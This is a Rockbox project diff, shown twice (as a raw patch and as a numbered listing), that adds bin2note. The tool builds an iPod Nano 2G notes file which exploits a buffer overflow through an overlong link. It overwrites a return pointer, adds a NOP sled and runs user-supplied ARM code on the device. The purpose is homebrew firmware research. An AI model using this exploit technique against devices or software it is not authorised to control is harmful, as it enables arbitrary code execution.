3 files changed, 208 insertions, 0 deletions
diff --git a/utils/ipod/bin2note/Makefile b/utils/ipod/bin2note/Makefile
new file mode 100644
index 0000000000..b5fd564d0a
--- /dev/null
+++ b/utils/ipod/bin2note/Makefile
@@ -0,0 +1,16 @@
+#             __________               __   ___.
+#   Open      \______   \ ____   ____ |  | _\_ |__   _______  ___
+#   Source     |       _//  _ \_/ ___\|  |/ /| __ \ /  _ \  \/  /
+#   Jukebox    |    |   (  <_> )  \___|    < | \_\ (  <_> > <  <
+#   Firmware   |____|_  /\____/ \___  >__|_ \|___  /\____/__/\_ \
+#                     \/            \/     \/    \/            \/
+# $Id$
+#
+all: bin2note
+bin2note: bin2note.c
+        gcc -W -Wall -o bin2note bin2note.c
+clean:
+        rm -f bin2note
diff --git a/utils/ipod/bin2note/README b/utils/ipod/bin2note/README
new file mode 100644
index 0000000000..40f285ccd5
--- /dev/null
+++ b/utils/ipod/bin2note/README
@@ -0,0 +1,12 @@
+bin2note
+--------
+bin2note implements the buffer overflow exploit documented here:
+http://l4n.clustur.com/index.php/Nano2G_getting_exec
+It is used to turn a blob of ARM code into an iPod notes file.  This
+ARM code will then be executed on the iPod.
+It is known to work on the 2nd generation Nano.
diff --git a/utils/ipod/bin2note/bin2note.c b/utils/ipod/bin2note/bin2note.c
new file mode 100644
index 0000000000..5100039962
--- /dev/null
+++ b/utils/ipod/bin2note/bin2note.c
@@ -0,0 +1,180 @@
+/***************************************************************************
+ *             __________               __   ___.
+ *   Open      \______   \ ____   ____ |  | _\_ |__   _______  ___
+ *   Source     |       _//  _ \_/ ___\|  |/ /| __ \ /  _ \  \/  /
+ *   Jukebox    |    |   (  <_> )  \___|    < | \_\ (  <_> > <  <
+ *   Firmware   |____|_  /\____/ \___  >__|_ \|___  /\____/__/\_ \
+ *                     \/            \/     \/    \/            \/
+ * $Id$
+ *
+ * bin2note - a program to insert binary code in an iPod Nano 2nd
+ *            Generation notes file
+ *
+ * Based on research by stooo, TheSeven and others.
+ *
+ * Copyright (C) 2009 Dave Chapman
+ *
+ * This program is free software; you can redistribute it and/or
+ * modify it under the terms of the GNU General Public License
+ * as published by the Free Software Foundation; either version 2
+ * of the License, or (at your option) any later version.
+ *
+ * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
+ * KIND, either express or implied.
+ *
+ ****************************************************************************/
+#include <stdio.h>
+#include <string.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdint.h>
+#ifndef O_BINARY
+#define O_BINARY 0
+#endif
+static off_t filesize(int fd)
+{
+    struct stat buf;
+    fstat(fd,&buf);
+    return buf.st_size;
+}
+void write_utf16le(unsigned char* buf, int len, FILE* fp)
+{
+    int i;
+    char tmp[2];
+    tmp[1] = 0;
+    for (i=0;i<len;i++) {
+       tmp[0] = buf[i];
+       fwrite(tmp, 1, sizeof(tmp), fp);
+    }
+}
+void insert_link(unsigned char* buf, uint32_t pointer)
+{
+   char link[] = "<a href=\"AAAAAAA"
+                 "AAAAAAAAAAAAAAAA"
+                 "AAAAAAAAAAAAAAAA"
+                 "AAAAAAAAAAAAAAAA"
+                 "AAAAAAAAAAAAAAAA"
+                 "AAAAAAAAAAAAAAAA"
+                 "AAAAAAAAAAAAAAAA"
+                 "AAAAAAAAAAAAAAAA"
+                 "AAAAAAAAAAAAAAAA"
+                 "AAAAAAAAAAAAAAAA"
+                 "AAAAAAAAAAAAAAAA"
+                 "AAAAAAAAAAAAAAAA"
+                 "AAAAAAAAAAAAAAAA"
+                 "AAAAAAAAAAAAAAAA"
+                 "AAAAAAAAAAAAAAAA"
+                 "AAAAAAAAAAAAAAAA"
+                 "AAAAAAAAAAAAAAAA"
+                 "AAAAAAAAAAAAA%xx"
+                 "%xx%xx%xx\"></a>";
+    char tmp[32];
+    unsigned int i;
+    sprintf(tmp, "%%%02x%%%02x%%%02x%%%02x",
+                 pointer & 0xff,
+                 (pointer >> 8) & 0xff,
+                 (pointer >> 16) & 0xff,
+                 (pointer >> 24) & 0xff);
+    memcpy(link + 0x11d, tmp, 12);
+    /* UTF-16 little-endian BOM */
+    buf[0] = 0xff;
+    buf[1] = 0xfe;
+    /* UTF-16 little-endian URL */
+    for (i=0;i<strlen(link);i++) {
+       buf[i*2+2] = link[i];
+       buf[i*2+3] = 0;
+    }
+}
+#define MAX_NOTES_SIZE 4096
+#define MAX_PAYLOAD_SIZE (MAX_NOTES_SIZE - 0x260 - 4)
+int main (int argc, char* argv[])
+{
+    char* infile;
+    char* htmname;
+    int fdin,fdout;
+    unsigned char buf[MAX_NOTES_SIZE];
+    int len;
+    int n;
+    int i;
+    if (argc != 3) {
+        fprintf(stderr,"Usage: bin2note file.bin file.htm\n");
+        return 1;
+    }
+    infile=argv[1];
+    htmname=argv[2];
+    fdin = open(infile,O_RDONLY|O_BINARY);
+    if (fdin < 0) {
+        fprintf(stderr,"Can not open %s\n",infile);
+        return 1;
+    }
+    len = filesize(fdin);
+    if (len > MAX_PAYLOAD_SIZE) {
+        fprintf(stderr,"Payload too big!\n");
+        close(fdin);
+        return 1;
+    }
+    /* **** Input file is OK, now build the note **** */
+    
+    /* Insert URL at start of note */
+    insert_link(buf, 0x08640568);
+    /* Load code at offset 0x260 */
+    n = read(fdin,buf + 0x260,len);
+    if (n < len) {
+        fprintf(stderr,"Short read, aborting\n");
+        return 1;
+    }
+    close(fdin);
+    /* Fill the remaining buffer with NOPs (mov r1,r1) - 0xe1a01001 */
+    for (i=0x260 + len; i < MAX_NOTES_SIZE-4; i+=4) {
+        buf[i] = 0x01;
+        buf[i+1] = 0x10;
+        buf[i+2] = 0xa0;
+        buf[i+3] = 0xe1;
+    }
+    /* Finally append a branch back to our code - 0x260 in the note */
+    buf[MAX_NOTES_SIZE-4] = 0x97;
+    buf[MAX_NOTES_SIZE-3] = 0xfc;
+    buf[MAX_NOTES_SIZE-2] = 0xff;
+    buf[MAX_NOTES_SIZE-1] = 0xea;
+    fdout = open(htmname, O_CREAT|O_TRUNC|O_BINARY|O_WRONLY, 0666);
+    if (fdout < 0) {
+        fprintf(stderr,"Could not open output file\n");
+        return 1;
+    }
+    if (write(fdout, buf, sizeof(buf)) != sizeof(buf)) {
+        fprintf(stderr,"Error writing output file\n");
+        close(fdout);
+        return 1;
+    }
+    close(fdout);
+    return 0;
+}

diff --git a/utils/ipod/bin2note/Makefile b/utils/ipod/bin2note/Makefile new file mode 100644 index 0000000000..b5fd564d0a --- /dev/null +++ b/utils/ipod/bin2note/Makefile
@@ -0,0 +1,16 @@
	1	# __________ __ ___.
	2	# Open \______ \ ____ ____ \| \| _\_ \|__ _______ ___
	3	# Source \| _// _ \_/ ___\\| \|/ /\| __ \ / _ \ \/ /
	4	# Jukebox \| \| ( <_> ) \___\| < \| \_\ ( <_> > < <
	5	# Firmware \|____\|_ /\____/ \___ >__\|_ \\|___ /\____/__/\_ \
	6	# \/ \/ \/ \/ \/
	7	# $Id$
	8	#
	9
	10	all: bin2note
	11
	12	bin2note: bin2note.c
	13	gcc -W -Wall -o bin2note bin2note.c
	14
	15	clean:
	16	rm -f bin2note


diff --git a/utils/ipod/bin2note/README b/utils/ipod/bin2note/README new file mode 100644 index 0000000000..40f285ccd5 --- /dev/null +++ b/utils/ipod/bin2note/README
@@ -0,0 +1,12 @@
	1	bin2note
	2	--------
	3
	4	bin2note implements the buffer overflow exploit documented here:
	5
	6	http://l4n.clustur.com/index.php/Nano2G_getting_exec
	7
	8
	9	It is used to turn a blob of ARM code into an iPod notes file. This
	10	ARM code will then be executed on the iPod.
	11
	12	It is known to work on the 2nd generation Nano.


diff --git a/utils/ipod/bin2note/bin2note.c b/utils/ipod/bin2note/bin2note.c new file mode 100644 index 0000000000..5100039962 --- /dev/null +++ b/utils/ipod/bin2note/bin2note.c
@@ -0,0 +1,180 @@
	1	/***************************************************************************
	2	* __________ __ ___.
	3	* Open \______ \ ____ ____ \| \| _\_ \|__ _______ ___
	4	* Source \| _// _ \_/ ___\\| \|/ /\| __ \ / _ \ \/ /
	5	* Jukebox \| \| ( <_> ) \___\| < \| \_\ ( <_> > < <
	6	* Firmware \|____\|_ /\____/ \___ >__\|_ \\|___ /\____/__/\_ \
	7	* \/ \/ \/ \/ \/
	8	* $Id$
	9	*
	10	* bin2note - a program to insert binary code in an iPod Nano 2nd
	11	* Generation notes file
	12	*
	13	* Based on research by stooo, TheSeven and others.
	14	*
	15	* Copyright (C) 2009 Dave Chapman
	16	*
	17	* This program is free software; you can redistribute it and/or
	18	* modify it under the terms of the GNU General Public License
	19	* as published by the Free Software Foundation; either version 2
	20	* of the License, or (at your option) any later version.
	21	*
	22	* This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
	23	* KIND, either express or implied.
	24	*
	25	****************************************************************************/
	26
	27	#include <stdio.h>
	28	#include <string.h>
	29	#include <sys/types.h>
	30	#include <sys/stat.h>
	31	#include <fcntl.h>
	32	#include <stdlib.h>
	33	#include <unistd.h>
	34	#include <stdint.h>
	35
	36	#ifndef O_BINARY
	37	#define O_BINARY 0
	38	#endif
	39
	40	static off_t filesize(int fd)
	41	{
	42	struct stat buf;
	43
	44	fstat(fd,&buf);
	45	return buf.st_size;
	46	}
	47
	48	void write_utf16le(unsigned char* buf, int len, FILE* fp)
	49	{
	50	int i;
	51	char tmp[2];
	52
	53	tmp[1] = 0;
	54
	55	for (i=0;i<len;i++) {
	56	tmp[0] = buf[i];
	57	fwrite(tmp, 1, sizeof(tmp), fp);
	58	}
	59	}
	60
	61	void insert_link(unsigned char* buf, uint32_t pointer)
	62	{
	63	char link[] = "<a href=\"AAAAAAA"
	64	"AAAAAAAAAAAAAAAA"
	65	"AAAAAAAAAAAAAAAA"
	66	"AAAAAAAAAAAAAAAA"
	67	"AAAAAAAAAAAAAAAA"
	68	"AAAAAAAAAAAAAAAA"
	69	"AAAAAAAAAAAAAAAA"
	70	"AAAAAAAAAAAAAAAA"
	71	"AAAAAAAAAAAAAAAA"
	72	"AAAAAAAAAAAAAAAA"
	73	"AAAAAAAAAAAAAAAA"
	74	"AAAAAAAAAAAAAAAA"
	75	"AAAAAAAAAAAAAAAA"
	76	"AAAAAAAAAAAAAAAA"
	77	"AAAAAAAAAAAAAAAA"
	78	"AAAAAAAAAAAAAAAA"
	79	"AAAAAAAAAAAAAAAA"
	80	"AAAAAAAAAAAAA%xx"
	81	"%xx%xx%xx\"></a>";
	82	char tmp[32];
	83	unsigned int i;
	84
	85	sprintf(tmp, "%%%02x%%%02x%%%02x%%%02x",
	86	pointer & 0xff,
	87	(pointer >> 8) & 0xff,
	88	(pointer >> 16) & 0xff,
	89	(pointer >> 24) & 0xff);
	90
	91	memcpy(link + 0x11d, tmp, 12);
	92
	93	/* UTF-16 little-endian BOM */
	94	buf[0] = 0xff;
	95	buf[1] = 0xfe;
	96
	97	/* UTF-16 little-endian URL */
	98	for (i=0;i<strlen(link);i++) {
	99	buf[i*2+2] = link[i];
	100	buf[i*2+3] = 0;
	101	}
	102	}
	103
	104	#define MAX_NOTES_SIZE 4096
	105	#define MAX_PAYLOAD_SIZE (MAX_NOTES_SIZE - 0x260 - 4)
	106
	107	int main (int argc, char* argv[])
	108	{
	109	char* infile;
	110	char* htmname;
	111	int fdin,fdout;
	112	unsigned char buf[MAX_NOTES_SIZE];
	113	int len;
	114	int n;
	115	int i;
	116
	117	if (argc != 3) {
	118	fprintf(stderr,"Usage: bin2note file.bin file.htm\n");
	119	return 1;
	120	}
	121
	122	infile=argv[1];
	123	htmname=argv[2];
	124
	125	fdin = open(infile,O_RDONLY\|O_BINARY);
	126	if (fdin < 0) {
	127	fprintf(stderr,"Can not open %s\n",infile);
	128	return 1;
	129	}
	130
	131	len = filesize(fdin);
	132
	133	if (len > MAX_PAYLOAD_SIZE) {
	134	fprintf(stderr,"Payload too big!\n");
	135	close(fdin);
	136	return 1;
	137	}
	138
	139	/* ** Input file is OK, now build the note ** */
	140
	141	/* Insert URL at start of note */
	142	insert_link(buf, 0x08640568);
	143
	144	/* Load code at offset 0x260 */
	145	n = read(fdin,buf + 0x260,len);
	146	if (n < len) {
	147	fprintf(stderr,"Short read, aborting\n");
	148	return 1;
	149	}
	150	close(fdin);
	151
	152	/* Fill the remaining buffer with NOPs (mov r1,r1) - 0xe1a01001 */
	153	for (i=0x260 + len; i < MAX_NOTES_SIZE-4; i+=4) {
	154	buf[i] = 0x01;
	155	buf[i+1] = 0x10;
	156	buf[i+2] = 0xa0;
	157	buf[i+3] = 0xe1;
	158	}
	159
	160	/* Finally append a branch back to our code - 0x260 in the note */
	161	buf[MAX_NOTES_SIZE-4] = 0x97;
	162	buf[MAX_NOTES_SIZE-3] = 0xfc;
	163	buf[MAX_NOTES_SIZE-2] = 0xff;
	164	buf[MAX_NOTES_SIZE-1] = 0xea;
	165
	166	fdout = open(htmname, O_CREAT\|O_TRUNC\|O_BINARY\|O_WRONLY, 0666);
	167	if (fdout < 0) {
	168	fprintf(stderr,"Could not open output file\n");
	169	return 1;
	170	}
	171
	172	if (write(fdout, buf, sizeof(buf)) != sizeof(buf)) {
	173	fprintf(stderr,"Error writing output file\n");
	174	close(fdout);
	175	return 1;
	176	}
	177
	178	close(fdout);
	179	return 0;
	180	}